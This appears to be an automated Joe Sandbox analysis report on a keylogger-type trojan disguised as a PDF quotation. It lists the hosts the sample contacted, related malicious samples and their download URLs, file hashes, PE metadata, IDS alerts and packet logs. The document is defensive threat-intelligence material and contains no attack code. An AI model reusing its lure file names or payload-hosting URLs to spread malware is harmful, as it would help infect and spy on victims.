http://filetransfer.io	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D5A1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1922304917.0000017A0D5A1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	aspnet_compiler.exe, 00000005.00000002.2658156720.000001AE6ADA0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2654091935.000001AE00113000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2656248989.000001AE10009000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	filetransfer.io	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525547
Start date and time:	2024-10-04 11:22:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe renamed because original name is a hash value
Original Sample Name:	QUOTATION_OCTQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 59% Number of executed functions: 196 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QUOTATION_OCTQTRA071244#U00faPDF.scr.exe, PID 7264 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:23:26	API Interceptor	13673x Sleep call for process: QUOTATION_OCTQTRA071244#U00faPDF.scr.exe modified
05:24:21	API Interceptor	34420x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2	Get hash	malicious	HTMLPhisher	Browse	mairie-espondeilhan.com/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/758bYd86/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	payment copy.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	BX7yRz7XqF.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	cloud.dellicon.top/1000/500/
	jKSjtQ8W7O.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/7vun/
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	http://meta.case-page-appeal.eu/community-standard/208273899187123/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
188.114.96.3	1tstvk3Sls.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3/qjqzqiiqayjq
	http://Asm.alcateia.org	Get hash	malicious	HTMLPhisher	Browse	asm.alcateia.org/
	hbwebdownload - MT 103.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Confirmation transfer AGS # 03-10-24.scr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Urgent inquiry for quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ziraat Bankasi Swift Mesaji_20241003_3999382.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	doc_20241003_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	MT103-93850.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	IMG_50026_1780.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	StatementXofXaccount.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	Confirmation transfer AGS # 03-10-24.scr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Urgent inquiry for quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Ziraat Bankasi Swift Mesaji_20241003_3999382.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	doc_20241003_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	MT103-93850.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	IMG_50026_1780.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	StatementXofXaccount.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
s20.filetransfer.io	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	wo0QLwJCbQ.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_JUNQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.96.3
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.97.3
	DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.13.139
	rNewOrderConfirmation202311028.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.21.13.139
	rKlockner-Pentaplast_Companyprofile-Order.exe	Get hash	malicious	AveMaria, PrivateLoader	Browse	104.21.13.139
	QUOTATION_OCTQTRFA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla	Browse	104.21.13.139
filetransfer.io	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://iasitvlife.ro	Get hash	malicious	Unknown	Browse	104.17.25.14
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
CLOUDFLARENETUS	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://iasitvlife.ro	Get hash	malicious	Unknown	Browse	104.17.25.14
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
ORACLE-BMC-31898US	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	doc_20241003_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	MT103-93850.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	StatementXofXaccount.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	TTXAPPLICATION.xls	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	z1PurchaseOrder.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MT Eagle Asia 1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	KBGC_1200O000000_98756.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Updated New Order.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation transfer AGS # 03-10-24.scr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Urgent inquiry for quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Ziraat Bankasi Swift Mesaji_20241003_3999382.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	doc_20241003_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	IMG_50026_1780.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z1PurchaseOrder.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Ft.204815963710.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Payment Advice Note.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3 188.114.96.3
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3 188.114.96.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3 188.114.96.3
	Transfer.lnk	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3 188.114.96.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Pago1032024.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Confirmation transfer AGS # 03-10-24.scr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3 188.114.96.3
	QUOTATIONS#08671.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3 188.114.96.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.927618744481639
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe
File size:	1'479'168 bytes
MD5:	2841a5211dd5eee5bcc3c3048b5d00da
SHA1:	a3de07870057a11804c108ca3848b7cf28adbf6b
SHA256:	94226064206b06a63579726747ae6900e6b6335b03b4bb00baf6f9cb0cbb1318
SHA512:	9b5941df181ab041ca138239c7737624e4cfea5197c75bfc506e8eeedca583804e3da439fd5759fe32d450e5691e638e4400bf8be6a6788fc7e84a7eed0f538f
SSDEEP:	24576:fueTHvQfTvBuYfkWBqhaHvc/OR9rJaSIUfdr2HWkwtG7pAa2StwY:fjTofT7BXFxa5
TLSH:	CB655C0C7398E256CC2D167556B0C8124734C0A999E7FBA32AB2E9F4D78EB58142D1FF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...d~.f.........."...................... ....@...... ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FF7E64 [Fri Oct 4 05:34:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16c000	0x800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1686ec	0x168800	7cb97d34e376e933d6d3255f27c9138e	False	0.35763452453190014	data	5.929947509140091	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16c000	0x800	0x800	0755f395d5e09ffbdf0b81cb83473b04	False	0.3447265625	data	3.5510976159704484	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x16c0a0	0x3ba	data			0.4161425576519916
RT_MANIFEST	0x16c45c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T11:24:21.381170+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49713	158.101.44.242	80	TCP
2024-10-04T11:24:22.240555+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49713	158.101.44.242	80	TCP
2024-10-04T11:24:22.825457+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49715	188.114.96.3	443	TCP
2024-10-04T11:24:23.417094+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49716	158.101.44.242	80	TCP
2024-10-04T11:24:24.009850+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49717	188.114.96.3	443	TCP
2024-10-04T11:24:26.636493+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49721	188.114.96.3	443	TCP
2024-10-04T11:24:27.810889+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49723	188.114.96.3	443	TCP
2024-10-04T11:24:30.202999+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49727	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 11:23:26.348165035 CEST	49707	80	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:26.353056908 CEST	80	49707	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:26.353127956 CEST	49707	80	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:26.353785038 CEST	49707	80	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:26.358550072 CEST	80	49707	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.005758047 CEST	80	49707	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.053817987 CEST	49707	80	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.062489033 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.062536001 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.064805984 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.144635916 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.144656897 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.629365921 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.629436016 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.641470909 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.641484976 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.641967058 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:27.694422007 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:27.973421097 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:28.019409895 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:28.820453882 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:28.820590973 CEST	443	49708	188.114.97.3	192.168.2.9
Oct 4, 2024 11:23:28.820714951 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:28.838289022 CEST	49708	443	192.168.2.9	188.114.97.3
Oct 4, 2024 11:23:28.869539022 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:28.869590044 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:28.869657040 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:28.870028019 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:28.870045900 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:29.325921059 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:29.326069117 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:29.327666044 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:29.327678919 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:29.327925920 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:29.331557035 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:29.375426054 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161391020 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161447048 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161484957 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161523104 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161526918 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.161556005 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161591053 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.161598921 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161639929 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.161647081 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161922932 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.161967039 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.161974907 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.166105986 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.166140079 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.166169882 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.166183949 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.166227102 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.247679949 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.247783899 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.247842073 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.247865915 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.248008966 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.248047113 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.248055935 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.248353004 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.248383999 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.248398066 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.248405933 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.248440981 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.248505116 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.249000072 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.249030113 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.249053001 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.249059916 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.249135971 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.249202013 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.254971027 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.254997015 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255021095 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.255036116 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255072117 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.255182028 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255243063 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255273104 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255278111 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.255285978 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255321980 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 4, 2024 11:23:30.255398035 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255733013 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255764961 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 4, 2024 11:23:30.255769968 CEST	49709	443	192.168.2.9	188.114.96.3
